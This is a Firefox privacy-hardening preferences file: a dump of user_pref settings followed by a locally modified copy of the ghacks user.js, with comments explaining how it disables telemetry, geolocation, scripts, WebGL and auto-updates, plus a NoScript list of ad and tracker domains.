user_pref("general.warnOnAboutConfig", false); user_pref("geo.enabled", false); user_pref("geo.wifi.uri", ""); user_pref("gestures.enable_single_finger_input", false); user_pref("gfx.blacklist.canvas2d.acceleration.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.direct2d.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.direct3d11angle.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.hardwarevideodecoding.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.layers.direct3d10-1.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.layers.direct3d10.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.layers.direct3d11.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.layers.direct3d9.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.layers.opengl.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.stagefright.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.webgl.angle.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.webgl.msaa.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.webgl.opengl.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.webrtc.hw.acceleration.decode.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.webrtc.hw.acceleration.encode.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.blacklist.webrtc.hw.acceleration.failureid", "FEATURE_FAILURE_OPENGL_1"); user_pref("gfx.canvas.skiagl.dynamic-cache", false); user_pref("gfx.direct2d.disabled", true); user_pref("gfx.downloadable_fonts.disable_cache", true); user_pref("gfx.downloadable_fonts.enabled", false); user_pref("gfx.downloadable_fonts.woff2.enabled", false); user_pref("identity.fxaccounts.auth.uri", ""); user_pref("idle.lastDailyNotification", 1599826369); user_pref("image.cache.size", 0); user_pref("intl.accept_languages", "en-us"); user_pref("intl.charset.fallback.override", "UTF-8"); user_pref("javascript.enabled", false); user_pref("javascript.options.wasm", false); user_pref("javascript.options.wasm_baselinejit", false); user_pref("keyword.enabled", false); user_pref("layers.shared-buffer-provider.enabled", false); user_pref("layout.css.font-loading-api.enabled", false); user_pref("layout.css.prefixes.font-features", false); user_pref("layout.css.visited_links_enabled", false); user_pref("layout.spellcheckDefault", 0); user_pref("lightweightThemes.update.enabled", false); user_pref("mathml.disabled", true); user_pref("media.autoplay.enabled", false); user_pref("media.cache_size", 0); user_pref("media.decoder-doctor.notifications-allowed", ""); user_pref("media.encoder.webm.enabled", false); user_pref("media.ffmpeg.enabled", false); user_pref("media.getusermedia.screensharing.allowed_domains", ""); user_pref("media.getusermedia.screensharing.enabled", false); user_pref("media.gmp-manager.certs.1.commonName", ""); user_pref("media.gmp-manager.certs.2.commonName", ""); user_pref("media.gmp-manager.url", ""); user_pref("media.hardware-video-decoding.enabled", false); user_pref("media.mediasource.enabled", false); user_pref("media.mediasource.mp4.enabled", false); user_pref("media.mediasource.webm.audio.enabled", false); user_pref("media.mediasource.webm.enabled", false); user_pref("media.mp4.enabled", false); user_pref("media.ogg.enabled", false); user_pref("media.ogg.flac.enabled", false); user_pref("media.ondevicechange.enabled", false); user_pref("media.opus.enabled", false); user_pref("media.play-stand-alone", false); user_pref("media.seekToNextFrame.enabled", false); user_pref("media.video-queue.default-size", 0); user_pref("media.video_stats.enabled", false); user_pref("media.wave.enabled", false); user_pref("media.webaudio.enabled", false); user_pref("media.webm.enabled", false); user_pref("network.allow-experiments", false); user_pref("network.cookie.cookieBehavior", 2); user_pref("network.cookie.lifetimePolicy", 2); user_pref("network.cookie.prefsMigrated", true); user_pref("network.dns.blockDotOnion", false); user_pref("network.dns.disableIPv6", true); user_pref("network.dnsCacheEntries", 0); user_pref("network.http.accept.default", "application/xml, application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*; q=0.5"); user_pref("network.http.max-connections", 16); user_pref("network.http.pipelining", false); user_pref("network.http.pipelining.reschedule-on-timeout", false); user_pref("network.http.pipelining.ssl", false); user_pref("network.http.referer.XOriginPolicy", 2); user_pref("network.http.referer.spoofSource", true); user_pref("network.http.referer.trimmingPolicy", 2); user_pref("network.http.sendRefererHeader", 0); user_pref("network.http.spdy.allow-push", false); user_pref("network.http.spdy.coalesce-hostnames", false); user_pref("network.notify.IPv6", false); user_pref("network.protocol-handler.warn-external-default", false); user_pref("network.proxy.no_proxies_on", ".pro-linux.de, .rpmfind.net, .palemoon.org"); user_pref("network.proxy.socks", "127.0.0.1"); user_pref("network.proxy.socks_port", 9050); user_pref("network.proxy.type", 1); user_pref("network.websocket.max-connections", 1); user_pref("network.websocket.max-message-size", 1); user_pref("network.websocket.timeout.close", 1); user_pref("network.websocket.timeout.open", 1); user_pref("network.websocket.timeout.ping.response", 1); user_pref("noscript.ABE.cspHeaderDelim", "ABE0-28605766426066737"); user_pref("noscript.ABE.migration", 1); user_pref("noscript.ABE.wanIpCheckURL", ""); user_pref("noscript.allowHttpsOnly", 2); user_pref("noscript.allowWhitelistUpdates", false); user_pref("noscript.cascadePermissions", true); user_pref("noscript.clearClick.exceptions", ""); user_pref("noscript.clearClick.subexceptions", ""); user_pref("noscript.contentBlocker", true); user_pref("noscript.default", "about:blank about:pocket-signup about:pocket-saved"); user_pref("noscript.filterXExceptions", "^https?://[a-z]+\.wikipedia\.org/wiki/[^\"<>?%]+$ "); user_pref("noscript.firstRunRedirection", false); user_pref("noscript.firstRunRedirection.pending", "5.1.8.7"); user_pref("noscript.fixLinks", false); user_pref("noscript.forbidBGRefresh.exceptions", ""); user_pref("noscript.forbidBookmarklets", true); user_pref("noscript.forbidIFrames", true); user_pref("noscript.forbidMetaRefresh", true); user_pref("noscript.forbidMetaRefresh.exceptions", ""); user_pref("noscript.forbidWebGL", true); user_pref("noscript.frameOptions.parentWhitelist", ""); user_pref("noscript.global", true); user_pref("noscript.gtemp", ""); user_pref("noscript.httpsForced", "*"); user_pref("noscript.httpsForcedBuiltIn", ""); user_pref("noscript.httpsForcedExceptions", "mirror.centos.org ftp. scientificlinux.org ftp.pbone. net ftp.ntua. gr archive.ubuntu.com "); user_pref("noscript.ignorePorts", false); user_pref("noscript.inclusionTypeChecking.exceptions", ""); user_pref("noscript.notify", false); user_pref("noscript.notify.bottom", false); user_pref("noscript.notify.hide", true); user_pref("noscript.notify.hideDelay", 2); user_pref("noscript.options.tabSelectedIndexes", "1,1,2"); user_pref("noscript.restrictSubdocScripting", true); user_pref("noscript.showAddress", true); user_pref("noscript.showDomain", true); user_pref("noscript.siteInfoProvider", ""); user_pref("noscript.statusLabel", true); user_pref("noscript.subscription.lastCheck", 2112788290); user_pref("noscript.surrogate.360Haven.sources", ""); user_pref("noscript.surrogate.ab_adsense.sources", ""); user_pref("noscript.surrogate.ab_adtiger.sources", ""); user_pref("noscript.surrogate.ab_bidvertiser.sources", ""); user_pref("noscript.surrogate.ab_binlayer.sources", ""); user_pref("noscript.surrogate.ab_mirago.sources", ""); user_pref("noscript.surrogate.ab_mirando.sources", ""); user_pref("noscript.surrogate.adagionet.sources", ""); user_pref("noscript.surrogate.addthis.sources", ""); user_pref("noscript.surrogate.adfly.sources", ""); user_pref("noscript.surrogate.amo.sources", ""); user_pref("noscript.surrogate.digg.sources", ""); user_pref("noscript.surrogate.dimtus.sources", ""); user_pref("noscript.surrogate.disqus-theme.sources", ""); user_pref("noscript.surrogate.ga.sources", ""); user_pref("noscript.surrogate.gigya.sources", ""); user_pref("noscript.surrogate.glinks.sources", ""); user_pref("noscript.surrogate.googleThumbs.sources", ""); user_pref("noscript.surrogate.googletag.sources", ""); user_pref("noscript.surrogate.gravatar.sources", ""); user_pref("noscript.surrogate.imagebam.sources", ""); user_pref("noscript.surrogate.imagebunk.sources", ""); user_pref("noscript.surrogate.imdb.sources", ""); user_pref("noscript.surrogate.imgreserve.sources", ""); user_pref("noscript.surrogate.interstitialBox.sources", ""); user_pref("noscript.surrogate.invodo.sources", ""); user_pref("noscript.surrogate.microsoftSupport.sources", ""); user_pref("noscript.surrogate.nscookie.sources", ""); user_pref("noscript.surrogate.picbucks.sources", ""); user_pref("noscript.surrogate.picsee.sources", ""); user_pref("noscript.surrogate.plusone.sources", ""); user_pref("noscript.surrogate.popunder.exceptions", ""); user_pref("noscript.surrogate.qs.sources", ""); user_pref("noscript.surrogate.skimlinks.sources", ""); user_pref("noscript.surrogate.stripe.sources", ""); user_pref("noscript.surrogate.twitter.sources", ""); user_pref("noscript.surrogate.uniblue.sources", ""); user_pref("noscript.surrogate.yieldman.sources", ""); user_pref("noscript.temp", ""); user_pref("noscript.untrusted", "127777.com ad-js.chip.de addthis.com admeira.ch adnxs.com adobedtm.com adrivo.com ads-twitter.com adsafeprotected.com adscale.de adserver.trojaner-info.de adtech.de adtm.chip.de ajax.googleapis.com akamaihd.net amazon-adsystem.com apa.at aspnetcdn.com assets-cdn.github.com assets.mtb-news.de assets.pons.com backbeatmedia.com bdi-services.de bf-ad.net bf-tools.net bootstrapcdn.com braintreegateway.com brightcove.net btstatic.com byu.edu cbsistatic.com cdn-dena.com cdn3.tekrevue.com cdn6.wn.com chartbeat.com clicktripz.com cloudflare.com cmp2.pcwelt.de cookielaw.org coveo.com d2zv5rkii46miq.cloudfront.net dealer.com deviantart.net disqus.com dropbox.com dynamicyield.com ensighten.com epfl.ch epoq.de etracker.com facebook.net fastly-insights.com filestorage.chip.de fontawesome.com geoedge.be go-mpulse.net google-analytics.com google.com googleadservices.com googlesyndication.com googletagmanager.com googletagservices.com gravatar.com gstatic.com h-bid.com hs-scripts.com hscta.net indexww.com instagram.com ioam.de jobs.net jquery.com jumpstarttaggingsolutions.com ligatus.com lots.co.in lp4.io maps.googleapis.com maxcdn.com mhcache.com mps-gba.de myvisualiq.net neads.delivery netdna-ssl.com onesignal.com onthe.io openx.net opinary.com opta.net optimizely.com outbrain.com p7s1.com parastorage.com permutive.com pinterest.com pixel-static.spotify.com polldaddy.com pololu-files.com polyfill.io ravenjs.com redhat.com regmedia.co.uk reutersmedia.net s2-prod.cornwalllive.com s3.reutersmedia.net s4.reutersmedia.net scdn.co sekindo.com servedby-buysellads.com shareaholic.com sharethis.com siteswithcontent.com skimresources.com smartredirect.de speedcurve.com static.ancientfaces.com static.zdassets.com staticcontent.fxstreet.com stats.wp.com stripe.com stroeerdigitalgroup.de subscribers.com teads.tv thomsonreuters.com tinypass.com tiqcdn.com tm-awx.com twimg.com twitter.com typekit.net usercentrics.eu vi-serve.com webmasterplan.com wordpress.com wp.com www.google.com www.instagram.com www8.hp.com yieldlove.com youtube.com zdassets.com zendesk.com http://127777.com http://addthis.com http://admeira.ch http://adnxs.com http://adobedtm.com http://adrivo.com http://ads-twitter.com http://adsafeprotected.com http://adscale.de http://adtech.de http://akamaihd.net http://amazon-adsystem.com http://apa.at http://aspnetcdn.com http://backbeatmedia.com http://bdi-services.de http://bf-ad.net http://bf-tools.net http://bootstrapcdn.com http://braintreegateway.com http://brightcove.net http://btstatic.com http://byu.edu http://cbsistatic.com http://cdn-dena.com http://chartbeat.com http://clicktripz.com http://cloudflare.com http://cookielaw.org http://coveo.com http://dealer.com http://deviantart.net http://disqus.com http://dropbox.com http://dynamicyield.com http://ensighten.com http://epfl.ch http://epoq.de http://etracker.com http://facebook.net http://fastly-insights.com http://fontawesome.com http://geoedge.be http://go-mpulse.net http://google-analytics.com http://google.com http://googleadservices.com http://googlesyndication.com http://googletagmanager.com http://googletagservices.com http://gravatar.com http://gstatic.com http://h-bid.com http://hs-scripts.com http://hscta.net http://indexww.com http://instagram.com http://ioam.de http://jobs.net http://jquery.com http://jumpstarttaggingsolutions.com http://ligatus.com http://lp4.io http://maxcdn.com http://mhcache.com http://mps-gba.de http://myvisualiq.net http://neads.delivery http://netdna-ssl.com http://onesignal.com http://onthe.io http://openx.net http://opinary.com http://opta.net http://optimizely.com http://outbrain.com http://p7s1.com http://parastorage.com http://permutive.com http://pinterest.com http://polldaddy.com http://pololu-files.com http://polyfill.io http://ravenjs.com http://redhat.com http://reutersmedia.net http://scdn.co http://sekindo.com http://servedby-buysellads.com http://shareaholic.com http://sharethis.com http://siteswithcontent.com http://skimresources.com http://smartredirect.de http://speedcurve.com http://stripe.com http://stroeerdigitalgroup.de http://subscribers.com http://teads.tv http://thomsonreuters.com http://tinypass.com http://tiqcdn.com http://tm-awx.com http://twimg.com http://twitter.com http://typekit.net http://usercentrics.eu http://vi-serve.com http://webmasterplan.com http://wordpress.com http://wp.com http://yieldlove.com http://youtube.com http://zdassets.com http://zendesk.com https://127777.com https://addthis.com https://admeira.ch https://adnxs.com https://adobedtm.com https://adrivo.com https://ads-twitter.com https://adsafeprotected.com https://adscale.de https://adserver.idg.de https://adtech.de https://akamaihd.net https://amazon-adsystem.com https://apa.at https://aspnetcdn.com https://backbeatmedia.com https://bdi-services.de https://bf-ad.net https://bf-tools.net https://bootstrapcdn.com https://braintreegateway.com https://brightcove.net https://btstatic.com https://byu.edu https://cbsistatic.com https://cdn-client.medium.com https://cdn-dena.com https://cdn.afterdawn.fi https://cdn.netzpolitik.org https://chartbeat.com https://clicktripz.com https://cloudflare.com https://cmp.chip.de https://cmp.focus.de https://cookielaw.org https://coveo.com https://dealer.com https://deviantart.net https://dialogue.sp-prod.net https://disqus.com https://dr.habracdn.net https://dropbox.com https://dynamicyield.com https://ensighten.com https://epfl.ch https://epoq.de https://etracker.com https://facebook.net https://fastly-insights.com https://fontawesome.com https://geoedge.be https://go-mpulse.net https://google-analytics.com https://google.com https://googleadservices.com https://googlesyndication.com https://googletagmanager.com https://googletagservices.com https://gravatar.com https://gstatic.com https://h-bid.com https://hs-scripts.com https://hscta.net https://hsto.org https://indexww.com https://instagram.com https://ioam.de https://jobs.net https://jquery.com https://jumpstarttaggingsolutions.com https://ligatus.com https://lp4.io https://maxcdn.com https://mhcache.com https://mps-gba.de https://myvisualiq.net https://neads.delivery https://netdna-ssl.com https://onesignal.com https://onthe.io https://openx.net https://opinary.com https://opta.net https://optimizely.com https://outbrain.com https://p7s1.com https://parastorage.com https://permutive.com https://pinterest.com https://polldaddy.com https://pololu-files.com https://polyfill.io https://ravenjs.com https://redhat.com https://reutersmedia.net https://s3-eu-central-1.amazonaws.com https://s3.amazonaws.com https://scdn.co https://sekindo.com https://servedby-buysellads.com https://shareaholic.com https://sharethis.com https://siteswithcontent.com https://skimresources.com https://smartredirect.de https://speedcurve.com https://static.cdn.prismic.io https://static.cleverpush.com https://static.criteo.net https://static.faz.net https://static.zeit.de https://stripe.com https://stroeerdigitalgroup.de https://subscribers.com https://teads.tv https://thomsonreuters.com https://tinypass.com https://tiqcdn.com https://tm-awx.com https://twimg.com https://twitter.com https://typekit.net https://unpkg.com https://usercentrics.eu https://vi-serve.com https://webmasterplan.com https://wordpress.com https://wp.com https://www.afterdawn.dk https://www.tagesschau.de https://yieldlove.com https://youtube.com https://zdassets.com https://zdwidget3-bs.sphereup.com https://zendesk.com"); user_pref("noscript.version", "2.9.0.13"); user_pref("noscript.visibleUIChecked", true); user_pref("noscript.xss.checkInclusions.exceptions", ""); user_pref("offline-apps.allow_by_default", false); user_pref("offline-apps.permissions", 0); user_pref("permissions.default.image", 3); user_pref("permissions.default.object", 3); user_pref("permissions.default.script", 3); user_pref("permissions.default.stylesheet", 3); user_pref("permissions.default.subdocument", 3); user_pref("places.database.lastMaintenance", 1599512467); user_pref("places.frecency.unvisitedBookmarkBonus", 0); user_pref("places.history.enabled", false); user_pref("places.history.expiration.transient_current_max_pages", 22381); user_pref("plugin.default.state", 0); user_pref("plugins.click_to_play", false); user_pref("plugins.update.url", ""); user_pref("pref.browser.language.disable_button.down", false); user_pref("pref.general.disable_button.default_browser", false); user_pref("pref.privacy.disable_button.cookie_exceptions", false); user_pref("print.print_bgcolor", false); user_pref("print.print_bgimages", false); user_pref("print.print_duplex", 0); user_pref("print.print_evenpages", true); user_pref("print.print_in_color", true); user_pref("print.print_margin_bottom", "0.5"); user_pref("print.print_margin_left", "0.5"); user_pref("print.print_margin_right", "0.5"); user_pref("print.print_margin_top", "0.5"); user_pref("print.print_oddpages", true); user_pref("print.print_orientation", 0); user_pref("print.print_page_delay", 50); user_pref("print.print_paper_data", 0); user_pref("print.print_paper_height", " 11,69"); user_pref("print.print_paper_name", "iso_a4"); user_pref("print.print_paper_size_unit", 0); user_pref("print.print_paper_width", " 8,27"); user_pref("print.print_scaling", " 1,00"); user_pref("print.print_shrink_to_fit", true); user_pref("print.print_to_file", false); user_pref("print.print_to_filename", "/home/secret/Dokumente/mozilla.pdf"); user_pref("print.print_unwriteable_margin_bottom", 56); user_pref("print.print_unwriteable_margin_left", 25); user_pref("print.print_unwriteable_margin_right", 25); user_pref("print.print_unwriteable_margin_top", 25); user_pref("print_printer", "Brother-DCP-115C"); user_pref("privacy.clearOnShutdown.connectivityData", true); user_pref("privacy.clearOnShutdown.offlineApps", true); user_pref("privacy.clearOnShutdown.passwords", true); user_pref("privacy.clearOnShutdown.siteSettings", true); user_pref("privacy.cpd.connectivityData", true); user_pref("privacy.cpd.offlineApps", true); user_pref("privacy.cpd.passwords", true); user_pref("privacy.cpd.siteSettings", true); user_pref("privacy.donottrackheader.enabled", true); user_pref("privacy.donottrackheader.value", 1); user_pref("privacy.item.cookies", true); user_pref("privacy.popups.disable_from_plugins", 3); user_pref("privacy.popups.showBrowserMessage", false); user_pref("privacy.sanitize.didShutdownSanitize", true); user_pref("privacy.sanitize.migrateFx3Prefs", true); user_pref("privacy.sanitize.sanitizeOnShutdown", true); user_pref("privacy.sanitize.timeSpan", 0); user_pref("privacy.trackingprotection.enabled", true); user_pref("privacy.trackingprotection.pbmode.enabled", true); user_pref("privacy.trackingprotection.ui.enabled", true); user_pref("privacy.userContext.enabled", false); user_pref("privacy.userContext.longPressBehavior", 0); user_pref("privacy.userContext.ui.enabled", true); user_pref("reader.parse-on-load.enabled", false); user_pref("security.OCSP.enabled", 0); user_pref("security.cert_pinning.hpkp.enabled", true); user_pref("security.csp.experimentalEnabled", true); user_pref("security.disable_button.openCertManager", false); user_pref("security.disable_button.openDeviceManager", false); user_pref("security.remember_cert_checkbox_default_setting", false); user_pref("security.ssl.errorReporting.url", ""); user_pref("security.ssl.require_safe_negotiation", true); user_pref("security.ssl3.dhe_rsa_camellia_128_sha", false); user_pref("security.ssl3.ecdhe_ecdsa_aes_128_sha", false); user_pref("security.ssl3.ecdhe_rsa_aes_128_sha", false); user_pref("security.ssl3.rsa_aes_128_sha", false); user_pref("security.tls.version.min", 3); user_pref("security.xcto_nosniff_block_images", true); user_pref("security.xpconnect.plugin.unrestricted", false); user_pref("services.sync.addons.trustedSourceHostnames", ""); user_pref("services.sync.clients.lastSync", "0"); user_pref("services.sync.clients.lastSyncLocal", "0"); user_pref("services.sync.declinedEngines", ""); user_pref("services.sync.fxa.privacyURL", ""); user_pref("services.sync.fxa.termsURL", ""); user_pref("services.sync.globalScore", 0); user_pref("services.sync.jpake.serverURL", ""); user_pref("services.sync.lastversion", "1.54.1"); user_pref("services.sync.log.appender.console", "Error"); user_pref("services.sync.migrated", true); user_pref("services.sync.miscURL", ""); user_pref("services.sync.nextSync", 0); user_pref("services.sync.outdated.url", ""); user_pref("services.sync.prefs. sync.dom.event.contextmenu.enabled", false); user_pref("services.sync.prefs.sync.extensions. ematrix.cloudStorage.myRulesPane", true); user_pref("services.sync.privacyURL", ""); user_pref("services.sync.serverURL", ""); user_pref("services.sync.statusURL", ""); user_pref("services.sync.syncKeyHelpURL", ""); user_pref("services.sync.tabs.lastSync", "0"); user_pref("services.sync.tabs.lastSyncLocal", "0"); user_pref("services.sync.termsURL", ""); user_pref("services.sync.tokenServerURI", ""); user_pref("signon.autologin.proxy", true); user_pref("signon.formlessCapture.enabled", false); user_pref("signon.importedFromSqlite", true); user_pref("signon.rememberSignons", false); user_pref("startup.homepage_override_url", ""); user_pref("startup.homepage_welcome_url", ""); user_pref("status4evar.advanced.status.detectVideo", false); user_pref("status4evar.firstRun", false); user_pref("status4evar.migration", 8); user_pref("storage.vacuum.last.index", 1); user_pref("storage.vacuum.last.places.sqlite", 1598197230); user_pref("svg.display-lists.hit-testing.enabled", false); user_pref("svg.display-lists.painting.enabled", false); user_pref("svg.in-content.enabled", false); user_pref("svg.marker-improvements.enabled", false); user_pref("svg.path-caching.enabled", false); user_pref("svg.transform-box.enabled", true); user_pref("toolkit.startup.last_success", 1599840550); user_pref("toolkit.telemetry.reportingpolicy.firstRun", false); user_pref("webextensions.storage.sync.serverURL", ""); user_pref("webgl.disable-DOM-blit-uploads", true); user_pref("webgl.disable-angle", true); user_pref("webgl.disable-extensions", true); user_pref("webgl.disable-fail-if-major-performance-caveat", true); user_pref("webgl.disable-wgl", true); user_pref("webgl.disabled", true); user_pref("webgl.min_capability_mode", true); user_pref("webgl.restore-context-when-visible", false); user_pref("xpinstall.whitelist.add", ""); user_pref("xpinstall.whitelist.required", true); user.js (with some internal changes by us, Gooken) from https://www.ghacks.net/2015/08/18/a-comprehensive-list-of-firefox-privacy-and-security-settings/ /****** * name: ghacks user.js * date: 11 Feb 2017 * version: 0.11 FINAL : The [White?] House of the Rising Pants, * NOTICE: GOOKEN MADE SOME INTERNAL CHANGES!!! * "My mother was a tailor, she sewed my new blue pants" * FF version: 51 (DESKTOP) * authors: FLOTUS: Pants VICE PRESIDENT: earthling (birth certificate on request) SECRETARY: Martin Brinkmann SPEAKER: Tom Hawack CABINET: Just me, Conker, Rockin´ Jerry, Ainatar, Parker Lewis * url: http://www.ghacks.net/2015/08/18/a-comprehensive-list-of-firefox-privacy-and-security-settings/ * required reading: http://kb.mozillazine.org/User.js_file * README/IMPORTANT: <font color=#ff3333>End users of this list/file are expected to know what they are doing. These are the author´s settings. The author does NOT expect (or indeed want) end users to just run with it as is. Use it as a comprehensive list, or as a template for your own.</font> Extensive links and comments have been added to help. Before using this user.js, if necessary, you should change, remove or comment out with two forward slashes any preferences you´re not happy with or not sure about. The settings in this file (user.js) OVERWRITE the ones in your prefs (prefs.js - these are accessed via about:config) when FF is started. See the required reading above. * BACKUP FIRST: Backup your profile first, or even just the PREFS.JS. Go to your profile directory and copy prefs.js, rename it (eg to prefs.js.backup). That way, if you have problems, to restore FF to the state it was in beforehand, close FF, delete the prefs.js, rename your backup copy of prefs back to prefs.js, RENAME the user.js so it doesn´t overwrite everything again, then start FF. IF you have any problems, you can also ask in the comments at ghacks. * PURPOSE: This is not a "comprehensive" list of ALL things privacy/security (otherwise it would be huge) It is more like a list of settings that generally differ from their defaults, and is aimed at improving security and privacy, at making a "quieter" FF, and at reducing fingerprinting and tracking, while allowing functionality. There will be trade-offs and conflicts between these. * COMMON ISSUES: Some prefs will break some sites (it´s inevitable). If you are having issues search for "WARNING:" in this document, especially the ones listed just below. <font color=#ff3333>This user.js uses the author´s settings, so you need to check these EACH release because the author prefers anonymity, security, and privacy over functionality [eg being able to paste in Facebook, downloadable fonts, and other minor inconveniences]. You have been warned.</font> 0202 &0204 &0207 &0208: search, language and locale settings 0903 &0904: master password (author set his up to last 5 minutes, default is once per session) 1007 &1008: disabling/reducing session store saves affects recently closed tabs history 1204: security.ssl.require_safe_negotiation 1206: security.OCSP.require 1208: security.cert_pinning.enforcement_level 1209: TLS min and max 1210: disable 1024-DH Encryption 1211: disable SHA-1 1212: disable SSL session tracking 1401 &1406: browser.display.use_document_fonts <font color=#ff3333>[author blocked fonts]</font> 1404: default fonts <font color=#ff3333>[author changed default fonts]</font> 1805: plugin.scan.plid.all <font color=#ff3333>[author blocked all plugins]</font> 1807: disable auto-play of HTML5 media (may break some sites´ playback) 2025: enable/disable media types <font color=#ff3333>[author´s settings, choose your own]</font> 2201: dom.event.contextmenu.enabled 2300´s: workers/service.workers/push notifications etc may affect twitter, street view and other sites 2402: dom.event.clipboardevents.enabled 2404: dom.indexedDB.enabled <font color=#ff3333>[author killed indexedDB]</font> 2415b: limit popup events 2421: two JS preferences that cause the odd issue (commented out, not worth the performance loss) 2507: keyboard fingerprinting (android + physical keyboard) 2508: hardware acceleration (performance vs lots of video, also fonts render differently) <font color=#ff3333>[author killed hardware acceleration]</font> 2509: dom.w3c_touch_events.enabled (you will want to change this if you use touch) 2619: network.http.redirection-limit 2627: various User Agent and navigator objects 2662: browser.download.forbid_open_with 2698: privacy.firstparty.isolate 2705: dom.storage.enabled * THANKS: Special thanks to Martin Brinkmann and the ghacks community Lots of websites, lots of people, too many to list but here are some excellent resources - https://github.com/pyllyukko/user.js - https://www.wilderssecurity.com/threads/firefox-lockdown.368003/ - http://12bytes.org/articles/tech/firefoxgecko-configuration-guide-for-privacy-and-performance-buffs - https://www.privacy-handbuch.de/handbuch_21.htm (German) ******/ // START: internal custom pref to test for syntax errors (thanks earthling) // Yes, this next pref setting is redundant, but I like it! // https://en.wikipedia.org/wiki/Dead_parrot // https://en.wikipedia.org/wiki/Warrant_canary /*** 0100: STARTUP ***/ // 0101: disable "slow startup" options // warnings, disk history, welcomes, intros, EULA, default browser check user_pref("browser.slowStartup.notificationDisabled", true); user_pref("browser.slowStartup.maxSamples", 0); user_pref("browser.slowStartup.samples", 0); user_pref("browser.rights.3.shown", true); user_pref("browser.startup.homepage_override.mstone", "ignore"); user_pref("startup.homepage_welcome_url", ""); user_pref("startup.homepage_welcome_url.additional", ""); user_pref("startup.homepage_override_url", ""); user_pref("browser.laterrun.enabled", false); user_pref("browser.shell.checkDefaultBrowser", false); user_pref("browser.shell.skipDefaultBrowserCheckOnFirstRun", true); user_pref("browser.usedOnWindows10.introURL", ""); // 0102: set start page (0=blank, 1=home, 2=last visited page, 3=resume previous session) // home = browser.startup.homepage preference // You can set all of this from Options>General>Startup // user_pref("browser.startup.page", 0); /*** 0200: GEOLOCATION ***/ // 0201: disable location-aware browsing user_pref("geo.enabled", false); user_pref("geo.wifi.uri", "https://127.0.0.1"); user_pref("geo.wifi.logging.enabled", false); // (hidden pref) user_pref("browser.search.geoip.url", ""); user_pref("geo.wifi.xhr.timeout", 1); user_pref("browser.search.geoip.timeout", 1); // 0202: disable GeoIP-based search results // NOTE: may not be hidden if Mozilla have changed your settings due to your locale // https://trac.torproject.org/projects/tor/ticket/16254 user_pref("browser.search.countryCode", "US"); // (hidden pref) user_pref("browser.search.region", "US"); // (hidden pref) // 0203: disable using OS locale, force APP locale user_pref("intl.locale.matchOS", false); // 0204: set APP local user_pref("general.useragent.locale", "en-US"); // 0206: disable geographically specific results/search engines eg: "browser.search.*.US" // i.e ignore all of Mozilla´s multiple deals with multiple engines in multiple locales user_pref("browser.search.geoSpecificDefaults", false); user_pref("browser.search.geoSpecificDefaults.url", ""); // 0207: set language to match // WARNING: reset this to your default if you don´t want English user_pref("intl.accept_languages", "en-US, en"); // 0208: enforce US English locale regardless of the system locale // https://bugzilla.mozilla.org/show_bug.cgi?id=867501 user_pref("javascript.use_us_english_locale", true); // (hidden pref) /*** 0300: QUIET FOX [PART 1] No auto-phoning home for anything. You can still do manual updates. It is still important to do updates for security reasons. If you don´t auto update, make sure you do manually. There are many legitimate reasons to turn off AUTO updates, including hijacked monetized extensions, time constraints, legacy issues, and fear of breakage/bugs ***/ // 0301: disable browser auto update // Options>Advanced>Update>Never check for updates user_pref("app.update.enabled", false); // Options>Advanced>Update>Use a background service to install updates user_pref("app.update.service.enabled", false); // ensure update information is not suppressed user_pref("app.update.silent", false); // disable background update staging user_pref("app.update.staging.enabled", false); // 0302: disable browser auto installing update when you do a manual check user_pref("app.update.auto", false); // 0303: disable search update (Options>Advanced>Update>Automatically update: search engines) user_pref("browser.search.update", false); // 0304: disable add-ons auto checking for new versions user_pref("extensions.update.enabled", false); // 0305: disable add-ons auto update user_pref("extensions.update.autoUpdateDefault", false); // 0306: disable add-on metadata updating // sends daily pings to Mozilla about extensions and recent startups user_pref("extensions.getAddons.cache.enabled", false); // 0307: disable auto updating of personas (themes) user_pref("lightweightThemes.update.enabled", false); // 0309: disable sending Flash crash reports user_pref("dom.ipc.plugins.flash.subprocess.crashreporter.enabled", false); // 0310: disable sending the URL of the website where a plugin crashed user_pref("dom.ipc.plugins.reportCrashURL", false); // 0320: disable extension discovery // featured extensions for displaying in Get Add-ons panel user_pref("extensions.webservice.discoverURL", "http://127.0.0.1"); // 0330a: disable telemetry // https://gecko.readthedocs.org/en/latest/toolkit/components/telemetry/telemetry/preferences.html // the pref (.unified) affects the behaviour of the pref (.enabled) // IF unified=false then .enabled controls the telemetry module // IF unified=true then .enabled ONLY controls whether to record extended data // so make sure to have both set as false user_pref("toolkit.telemetry.unified", false); user_pref("toolkit.telemetry.enabled", false); // 0330b: set unifiedIsOptIn to make sure telemetry respects OptIn choice and that telemetry // is enabled ONLY for people that opted into it, even if unified Telemetry is enabled user_pref("toolkit.telemetry.unifiedIsOptIn", true); // (hidden pref) // 0331: remove url of server telemetry pings are sent to user_pref("toolkit.telemetry.server", ""); // 0332: disable archiving pings locally - irrelevant if toolkit.telemetry.unified is false user_pref("toolkit.telemetry.archive.enabled", false); // 0333a: disable health report user_pref("datareporting.healthreport.uploadEnabled", false); user_pref("datareporting.healthreport.documentServerURI", ""); // (hidden pref) user_pref("datareporting.healthreport.service.enabled", false); // (hidden pref) // 0333b: disable about:healthreport page (which connects to Mozilla for locale/css+js+json) // If you have disabled health reports, then this about page is useless - disable it // If you want to see what health data is present, then these must be set at default user_pref("datareporting.healthreport.about.reportUrl", "data:text/plain,"); // 0334a: disable new data submission, master kill switch (FF41+) // If disabled, no policy is shown or upload takes place, ever // 